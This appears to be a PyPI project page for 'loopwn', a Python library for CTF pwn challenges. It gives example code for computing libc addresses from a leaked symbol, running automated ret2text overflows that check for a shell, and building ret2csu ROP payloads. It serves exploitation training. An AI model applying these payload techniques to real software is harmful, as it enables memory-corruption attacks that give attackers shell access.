A CTF pwn helper library for easy libc address calculation and exploitation
Project description
loopwn
A Python library designed to assist with CTF Pwn challenges, specifically focusing on Libc address calculation and leak exploitation.
Installation
pip install loopwn
Usage
1. Looplibc - Libc Address Calculation
from loopwn import Looplibc
# Example 1: Initialize with a known base address
libc = Looplibc('./libc.so.6', 0x7ffff7a0d000)
# Example 2: Initialize with a leaked symbol address
# This will automatically calculate the base address
libc = Looplibc('./libc.so.6', 'puts', 0x7ffff7a8c5a0)
# Access addresses
print(hex(libc.system))
print(hex(libc.bin_sh))
2. loop2text - Auto Ret2text Exploitation
from pwn import *
from loopwn import loop2text
# Start process
io = process('./pwn')
# Exploit
# Automatically sends payload and verifies shell with an echo check
# Args: padding_length, backdoor_address, io_object
loop2text(112, 0x401186, io)
3. loopcsu - Auto Ret2CSU Payload Generation
from loopwn import loopcsu
# Gadget addresses (Usually found in __libc_csu_init)
# csu_end: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# csu_start: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
csu_end = 0x4011da
csu_start = 0x4011c0
# Generate payload
# Args: csu_end, csu_start, r12, r13, r14, r15, return_addr, padding=0
payload = loopcsu(
csu_end, csu_start,
r12=0x601018, # Function pointer (e.g., GOT address)
r13=0, # Arg1 (EDI)
r14=1, # Arg2 (RSI)
r15=2, # Arg3 (RDX)
return_addr=0x401120,
padding=0x20
)
# Send payload
io.sendline(payload)
Features
- Automatic Base Calculation: Easily calculate libc base address from a leaked symbol.
- Quick Access: Get
systemand/bin/shaddresses via properties. - Auto Ret2Text: Generate payload and get shell in one line with
loop2text. - Auto Ret2CSU: Simplify Ret2CSU payload construction with
loopcsu. - Shell Verification: Automatically checks if shell is obtained.
- Pwntools Integration: Inherits from
pwntools'sELFclass.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
loopwn-0.3.9.tar.gz
(8.3 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file loopwn-0.3.9.tar.gz.
File metadata
- Download URL: loopwn-0.3.9.tar.gz
- Upload date:
- Size: 8.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
046665d885450e3b0281bb43b26a1dfcf7df4c82262f28e96f37652634e470e9
|
|
| MD5 |
9ca0976dcc00aaadb080d6783fca639b
|
|
| BLAKE2b-256 |
581cd93054cf2a212f2c0b6ff4b7638b297f525d8122f936efedfd8061e3ea68
|
File details
Details for the file loopwn-0.3.9-py3-none-any.whl.
File metadata
- Download URL: loopwn-0.3.9-py3-none-any.whl
- Upload date:
- Size: 9.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
6c10b62dd5590fb112927bce5af9e68a06bef1007501e438751a638834ad610b
|
|
| MD5 |
0f3cf95b50a3dd4a989884aa37e38f30
|
|
| BLAKE2b-256 |
7ad55649fedaa9bf36c8d74310c3b83fdae751d88c718dab9f5938e838dfc255
|
